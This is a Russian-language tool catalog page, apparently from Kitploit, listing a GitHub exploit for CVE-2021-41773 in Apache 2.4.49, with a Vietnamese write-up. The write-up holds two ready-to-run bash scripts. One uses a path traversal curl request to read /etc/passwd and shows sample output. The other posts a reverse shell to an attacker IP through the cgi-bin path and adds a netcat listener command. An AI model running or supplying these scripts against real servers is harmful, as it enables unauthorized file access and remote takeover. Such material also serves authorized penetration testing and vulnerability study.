Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41773-Apache-2.4.49- — Kiểm thử xâm nhập | Kitploit
Инструменты/GitHubGitHub/khaidtraivch/cve-2021-41773-apache-2.4.49-
Vulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubkhaidtraivch/cve-2021-41773-apache-2.4.49-

CVE-2021-41773-Apache-2.4.49-

Kiểm thử xâm nhập

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 год назадЕщё не проверено

CVE-2021-41773-Apache-2.4.49-

Тестирование на проникновение

1.1. Path Traversal (Чтение файла /etc/passwd) #!/bin/bash

Script: exploit_path_traversal.sh

Mục tiêu: Đọc tệp /etc/passwd từ Apache 2.4.49

TARGET_IP="128.0.0.100" URL="http://$TARGET_IP/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

echo "[+] Khai thác Path Traversal trên Apache 2.4.49..." curl -s "$URL" | head -n 5 # Hiển thị 5 dòng đầu của /etc/passwd

Kết quả demo:

$ ./exploit_path_traversal.sh [+] Khai thác Path Traversal trên Apache 2.4.49... root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync

1.2. Remote Code Execution (Reverse Shell) #!/bin/bash

Script: exploit_apache_rce.sh

Mục tiêu: Thực thi lệnh reverse shell qua CGI

TARGET_IP="128.0.0.100" ATTACKER_IP="192.168.0.101" PORT="4444"

echo "[+] Gửi reverse shell đến $ATTACKER_IP:$PORT..." curl -X POST
"http://$TARGET_IP/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
-H "Content-Type: application/x-www-form-urlencoded"
-d "echo; bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/$PORT 0>&1'"

Использование:

1. Откройте Netcat для прослушивания:

nc -lvnp 4444

2. Запустите скрипт:

./exploit_apache_rce.sh

Скачать инструмент